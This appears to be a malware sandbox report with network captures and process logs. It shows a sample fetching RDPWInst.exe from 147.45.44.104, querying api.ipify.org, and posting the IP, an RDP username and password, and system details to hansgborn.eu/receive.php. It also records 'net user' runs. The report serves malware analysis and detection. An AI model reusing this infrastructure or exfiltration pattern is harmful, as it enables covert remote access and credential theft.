                                                                              Oct 8, 2024 03:23:05.907927990 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907938004 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907960892 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.907967091 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.908004999 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.909611940 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909622908 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909634113 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909661055 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.909683943 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909694910 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909710884 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909718990 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.909719944 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909737110 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909759045 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.909770966 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.921902895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.921942949 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.921957016 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.921977997 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922019005 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922033072 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922048092 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922050953 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922063112 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922080040 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922084093 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922111034 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922123909 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922137976 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922163963 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922205925 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922215939 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922233105 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922245979 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922249079 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922272921 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922316074 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922332048 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922347069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922357082 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922367096 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922377110 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922403097 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922416925 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922427893 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922452927 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.959064007 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959095001 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959116936 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959122896 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.959127903 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959146976 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959152937 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.959163904 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959182024 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.959182024 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959225893 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.982518911 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982532024 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982554913 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982564926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982568026 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.982583046 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982616901 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982625961 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982630014 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.982646942 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982670069 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.982681990 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.986016035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986072063 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986097097 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986103058 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986113071 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.986114025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986121893 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986126900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986133099 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986227989 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.992165089 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992186069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992197037 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992212057 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992232084 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.992250919 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.992269039 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992280006 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992292881 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992316008 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992325068 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992326021 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.992356062 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:06.033905029 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:43.177139044 CEST4971080192.168.2.8104.26.12.205
                                                                              Oct 8, 2024 03:23:43.182027102 CEST8049710104.26.12.205192.168.2.8
                                                                              Oct 8, 2024 03:23:43.182207108 CEST4971080192.168.2.8104.26.12.205
                                                                              Oct 8, 2024 03:23:43.182337046 CEST4971080192.168.2.8104.26.12.205
                                                                              Oct 8, 2024 03:23:43.187063932 CEST8049710104.26.12.205192.168.2.8
                                                                              Oct 8, 2024 03:23:43.656218052 CEST8049710104.26.12.205192.168.2.8
                                                                              Oct 8, 2024 03:23:43.658847094 CEST497113389192.168.2.88.46.123.33
                                                                              Oct 8, 2024 03:23:43.663743973 CEST3389497118.46.123.33192.168.2.8
                                                                              Oct 8, 2024 03:23:43.663821936 CEST497113389192.168.2.88.46.123.33
                                                                              Oct 8, 2024 03:23:43.664128065 CEST497113389192.168.2.88.46.123.33
                                                                              Oct 8, 2024 03:23:43.669003963 CEST3389497118.46.123.33192.168.2.8
                                                                              Oct 8, 2024 03:23:43.669380903 CEST497113389192.168.2.88.46.123.33
                                                                              Oct 8, 2024 03:23:43.669517040 CEST4971080192.168.2.8104.26.12.205
                                                                              Oct 8, 2024 03:23:43.674329042 CEST8049710104.26.12.205192.168.2.8
                                                                              Oct 8, 2024 03:23:43.773303986 CEST8049710104.26.12.205192.168.2.8
                                                                              Oct 8, 2024 03:23:43.830863953 CEST4971080192.168.2.8104.26.12.205
                                                                              Oct 8, 2024 03:23:43.885102987 CEST49712443192.168.2.8188.114.96.3
                                                                              Oct 8, 2024 03:23:43.885139942 CEST44349712188.114.96.3192.168.2.8
                                                                              Oct 8, 2024 03:23:43.885199070 CEST49712443192.168.2.8188.114.96.3
                                                                              Oct 8, 2024 03:23:43.896358967 CEST49712443192.168.2.8188.114.96.3
                                                                              Oct 8, 2024 03:23:43.896378040 CEST44349712188.114.96.3192.168.2.8
                                                                              Oct 8, 2024 03:23:44.367943048 CEST44349712188.114.96.3192.168.2.8
                                                                              Oct 8, 2024 03:23:44.368017912 CEST49712443192.168.2.8188.114.96.3
                                                                              Oct 8, 2024 03:23:44.373521090 CEST49712443192.168.2.8188.114.96.3
                                                                              Oct 8, 2024 03:23:44.373533010 CEST44349712188.114.96.3192.168.2.8
                                                                              Oct 8, 2024 03:23:44.373780012 CEST44349712188.114.96.3192.168.2.8
                                                                              Oct 8, 2024 03:23:44.424592972 CEST49712443192.168.2.8188.114.96.3
                                                                              Oct 8, 2024 03:23:44.487854004 CEST49712443192.168.2.8188.114.96.3
                                                                              Oct 8, 2024 03:23:44.535413027 CEST44349712188.114.96.3192.168.2.8
                                                                              Oct 8, 2024 03:23:44.584709883 CEST44349712188.114.96.3192.168.2.8
                                                                              Oct 8, 2024 03:23:44.585036993 CEST49712443192.168.2.8188.114.96.3
                                                                              Oct 8, 2024 03:23:44.585057974 CEST44349712188.114.96.3192.168.2.8
                                                                              Oct 8, 2024 03:23:44.866015911 CEST44349712188.114.96.3192.168.2.8
                                                                              Oct 8, 2024 03:23:44.866087914 CEST44349712188.114.96.3192.168.2.8
                                                                              Oct 8, 2024 03:23:44.866168976 CEST49712443192.168.2.8188.114.96.3
                                                                              Oct 8, 2024 03:23:44.874368906 CEST49712443192.168.2.8188.114.96.3
                                                                              Oct 8, 2024 03:23:55.008536100 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:55.008897066 CEST4971080192.168.2.8104.26.12.205

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 8, 2024 03:23:43.018959045 CEST5659153192.168.2.81.1.1.1
                                                                              Oct 8, 2024 03:23:43.174551010 CEST53565911.1.1.1192.168.2.8
                                                                              Oct 8, 2024 03:23:43.871272087 CEST6224353192.168.2.81.1.1.1
                                                                              Oct 8, 2024 03:23:43.884118080 CEST53622431.1.1.1192.168.2.8

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 8, 2024 03:23:43.018959045 CEST192.168.2.81.1.1.10xdb0eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 03:23:43.871272087 CEST192.168.2.81.1.1.10xbd7eStandard query (0)hansgborn.euA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 8, 2024 03:23:43.174551010 CEST1.1.1.1192.168.2.80xdb0eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 03:23:43.174551010 CEST1.1.1.1192.168.2.80xdb0eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 03:23:43.174551010 CEST1.1.1.1192.168.2.80xdb0eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 03:23:43.884118080 CEST1.1.1.1192.168.2.80xbd7eNo error (0)hansgborn.eu188.114.96.3A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 03:23:43.884118080 CEST1.1.1.1192.168.2.80xbd7eNo error (0)hansgborn.eu188.114.97.3A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • hansgborn.eu
                                                                              • 147.45.44.104
                                                                              • api.ipify.org

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.849706147.45.44.104802444C:\Users\user\Desktop\hloRQZmlfg.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 03:23:03.960208893 CEST94OUTGET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1
                                                                              Host: 147.45.44.104
                                                                              Connection: Keep-Alive
                                                                              Oct 8, 2024 03:23:04.578062057 CEST1236INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Tue, 08 Oct 2024 01:23:04 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 1785344
                                                                              Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT
                                                                              Connection: keep-alive
                                                                              Keep-Alive: timeout=120
                                                                              ETag: "66f55533-1b3e00"
                                                                              X-Content-Type-Options: nosniff
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED]
                                                                              Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`|@@p@@
                                                                              Oct 8, 2024 03:23:04.578075886 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt@@SmallInt
                                                                              Oct 8, 2024 03:23:04.578092098 CEST448INData Raw: 15 40 00 42 00 f4 ff b2 15 40 00 43 00 f4 ff f0 15 40 00 42 00 f4 ff 1f 16 40 00 42 00 f4 ff 48 16 40 00 43 00 f4 ff 7c 16 40 00 43 00 f4 ff b5 16 40 00 43 00 f4 ff e0 16 40 00 43 00 f4 ff 09 17 40 00 43 00 f4 ff 35 17 40 00 43 00 f4 ff 71 17 40
                                                                              Data Ascii: @B@C@B@BH@C|@C@C@C@C5@Cq@C@C@C-@Bg@B@B@C%@CV@C@J@J@J@Ju@J@J@J@JO@Kz@J@MTOb
                                                                              Oct 8, 2024 03:23:04.578176975 CEST1236INData Raw: 58 12 40 00 08 00 01 08 d0 1b 40 00 00 00 04 53 65 6c 66 02 00 02 00 34 00 64 50 40 00 09 43 6c 61 73 73 4e 61 6d 65 03 00 10 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 10 12 40 00 01 00 01 01 02 00 02 00 39 00 7c 50 40 00 0b
                                                                              Data Ascii: X@@Self4dP@ClassName@Self@@9|P@ClassNameIs@Self@Name+Q@ClassParentX@Self)(T@ClassInfo@Self,TQ@InstanceSize@
                                                                              Oct 8, 2024 03:23:04.578186989 CEST1236INData Raw: 4d 65 73 73 61 67 65 02 00 02 00 3f 00 4c 54 40 00 0e 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 03 00 00 00 00 00 08 00 02 08 d0 1b 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 2b 00 24 51 40 00 0b 4e
                                                                              Data Ascii: Message?LT@DefaultHandler@SelfMessage+$Q@NewInstance@Self,@Q@FreeInstance@Self'|Q@Destroy@Self@@TObjectd@System@
                                                                              Oct 8, 2024 03:23:04.578203917 CEST1236INData Raw: 08 56 49 6e 74 65 67 65 72 02 00 54 11 40 00 08 00 00 00 02 07 56 53 69 6e 67 6c 65 02 00 78 11 40 00 08 00 00 00 02 07 56 44 6f 75 62 6c 65 02 00 88 11 40 00 08 00 00 00 02 09 56 43 75 72 72 65 6e 63 79 02 00 14 1e 40 00 08 00 00 00 02 05 56 44
                                                                              Data Ascii: VIntegerT@VSinglex@VDouble@VCurrency@VDate@VOleStr@VDispatchl@VError@VBoolean@VUnknownd@VShortInt@VByte@VWord@
                                                                              Oct 8, 2024 03:23:04.578258038 CEST1236INData Raw: 25 78 c4 44 00 8b c0 ff 25 74 c4 44 00 8b c0 ff 25 70 c4 44 00 8b c0 ff 25 6c c4 44 00 8b c0 ff 25 68 c4 44 00 8b c0 ff 25 64 c4 44 00 8b c0 ff 25 60 c4 44 00 8b c0 ff 25 08 c4 44 00 8b c0 ff 25 5c c4 44 00 8b c0 ff 25 58 c4 44 00 8b c0 ff 25 54
                                                                              Data Ascii: %xD%tD%pD%lD%hD%dD%`D%D%\D%XD%TD%D%D%D%PD%LD%D%D%D%HD%DD%@D%<D%8DS$DTBD$,t\$0D[@%4D
                                                                              Oct 8, 2024 03:23:04.578270912 CEST1236INData Raw: fc 8b 0d 3c 7a 44 00 29 c8 01 ca eb b9 c3 90 53 8b d8 e8 8c ff ff ff 6a 04 68 00 10 00 00 68 f0 ff 13 00 6a 00 e8 ed fb ff ff 85 c0 74 4d 8b 15 28 7a 44 00 8b c8 c7 01 24 7a 44 00 a3 28 7a 44 00 89 51 04 89 02 8b d0 81 c2 f0 ff 13 00 8b ca 83 e9
                                                                              Data Ascii: <zD)SjhhjtM(zD$zD(zDQ+<zD+8zD[3<zD3[=MpDt=)=xDu jD3tjlD3uSVWUNjhVj#
                                                                              Oct 8, 2024 03:23:04.578289032 CEST552INData Raw: 00 39 d7 72 02 89 cf 29 fe 29 3d 3c 7a 44 00 89 35 38 7a 44 00 eb 21 0f b7 43 1a 89 c7 e8 19 fb ff ff 89 c6 85 c0 75 10 a2 34 7a 44 00 88 03 5f 5e 5b c3 80 64 37 fc f7 8d 4f 06 89 4e fc 31 c0 a2 34 7a 44 00 89 1e 89 46 08 c7 46 0c 01 00 00 00 89
                                                                              Data Ascii: 9r))=<zD58zD!Cu4zD_^[d7ON14zDFFsF KS){p_^[%4zDtK=xDuj%4zDt*j=,0u#DzDt
                                                                              Oct 8, 2024 03:23:04.578303099 CEST1236INData Raw: 42 14 8b 4a 04 89 48 04 89 41 14 31 c0 39 53 10 75 03 89 43 0c 88 03 89 d0 8b 52 fc 8a 1d 4d 70 44 00 e9 85 00 00 00 b8 00 01 00 00 f0 0f b0 23 74 94 f3 90 80 3d d5 78 44 00 00 75 ea 51 52 6a 00 e8 e5 f4 ff ff 5a 59 b8 00 01 00 00 f0 0f b0 23 0f
                                                                              Data Ascii: BJHA19SuCRMpD#t=xDuQRjZY#oQRjZY%4zDtB=xDuj%4zDt!jVuD3L3u5L3Fu@tPCF\3Y4zD
                                                                              Oct 8, 2024 03:23:04.583029985 CEST1236INData Raw: 0a 04 00 73 12 f7 db d9 ee dd 14 13 83 c3 08 78 f8 89 0a dd c0 d9 f7 5b c3 8b c0 8b c8 8b d1 83 ea 04 8b 12 83 e2 f0 03 d1 8b c2 8b d0 83 ea 04 8b 12 83 e2 f0 85 d2 75 02 33 c0 c3 8d 40 00 83 3d 3c 7a 44 00 00 74 1a 8b 15 38 7a 44 00 3b d0 72 10
                                                                              Data Ascii: sx[u3@=<zDt8zD;r;8zDs=<zDt8zD3@SV ;BuZ;ZvB+^[BH^[WA_p0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.849710104.26.12.205802444C:\Users\user\Desktop\hloRQZmlfg.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 03:23:43.182337046 CEST63OUTGET / HTTP/1.1
                                                                              Host: api.ipify.org
                                                                              Connection: Keep-Alive
                                                                              Oct 8, 2024 03:23:43.656218052 CEST227INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 01:23:43 GMT
                                                                              Content-Type: text/plain
                                                                              Content-Length: 11
                                                                              Connection: keep-alive
                                                                              Vary: Origin
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf253c5697b43ff-EWR
                                                                              Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                              Data Ascii: 8.46.123.33
                                                                              Oct 8, 2024 03:23:43.669517040 CEST39OUTGET / HTTP/1.1
                                                                              Host: api.ipify.org
                                                                              Oct 8, 2024 03:23:43.773303986 CEST227INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 01:23:43 GMT
                                                                              Content-Type: text/plain
                                                                              Content-Length: 11
                                                                              Connection: keep-alive
                                                                              Vary: Origin
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf253c63a7043ff-EWR
                                                                              Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                              Data Ascii: 8.46.123.33


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.849712188.114.96.34432444C:\Users\user\Desktop\hloRQZmlfg.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 01:23:44 UTC166OUTPOST /receive.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: hansgborn.eu
                                                                              Content-Length: 193
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              2024-10-08 01:23:44 UTC25INHTTP/1.1 100 Continue
                                                                              2024-10-08 01:23:44 UTC193OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 52 44 50 55 73 65 72 5f 31 65 34 37 61 33 39 33 26 70 61 73 73 77 6f 72 64 3d 47 45 64 74 76 6e 35 38 72 66 64 72 26 6f 73 5f 6e 61 6d 65 3d 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 26 70 72 6f 63 65 73 73 6f 72 3d 49 6e 74 65 6c 28 52 29 2b 43 6f 72 65 28 54 4d 29 32 2b 43 50 55 2b 36 36 30 30 2b 25 34 30 2b 32 2e 34 30 2b 47 48 7a 26 63 6f 72 65 73 3d 34 26 67 70 75 3d 33 55 32 45 41 53 32 31 26 67 70 75 5f 6d 65 6d 6f 72 79 3d 31 30 32 34 26 72 61 6d 3d 34 30 39 35 26 64 69 73 6b 5f 73 70 61 63 65 3d 33 38 33
                                                                              Data Ascii: ip=8.46.123.33&user=RDPUser_1e47a393&password=GEdtvn58rfdr&os_name=Windows+10+Pro&processor=Intel(R)+Core(TM)2+CPU+6600+%40+2.40+GHz&cores=4&gpu=3U2EAS21&gpu_memory=1024&ram=4095&disk_space=383
                                                                              2024-10-08 01:23:44 UTC717INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 08 Oct 2024 01:23:44 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Content-Type-Options: nosniff
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n78Cuf5jALD%2BIbhiTCL4zbEwvNVt7zS7jEAlYva6PGfsrEFdGWZ5N3o80l8KBOuvC9cd%2FGlXNVidCcCS5S7I%2Fs3dcjDUXlBY9rTtQnB2KT6vpZPClKSJuOLsjYLOJus%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf253cb5d417c8d-EWR
                                                                              92
                                                                              <html>
                                                                              <head><title>404 Not Found</title></head>
                                                                              <body>
                                                                              <center><h1>404 Not Found</h1></center>
                                                                              <hr><center>nginx</center>
                                                                              </body>
                                                                              </html>
                                                                              2024-10-08 01:23:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:21:23:01
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\Desktop\hloRQZmlfg.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\hloRQZmlfg.exe"
                                                                              Imagebase:0x880000
                                                                              File size:76'800 bytes
                                                                              MD5 hash:CEE4E023E6AFAAA51F600CAEC3469215
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1405997855.0000000000882000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:21:23:02
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c net user
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:21:23:02
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:21:23:02
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net user
                                                                              Imagebase:0x210000
                                                                              File size:47'104 bytes
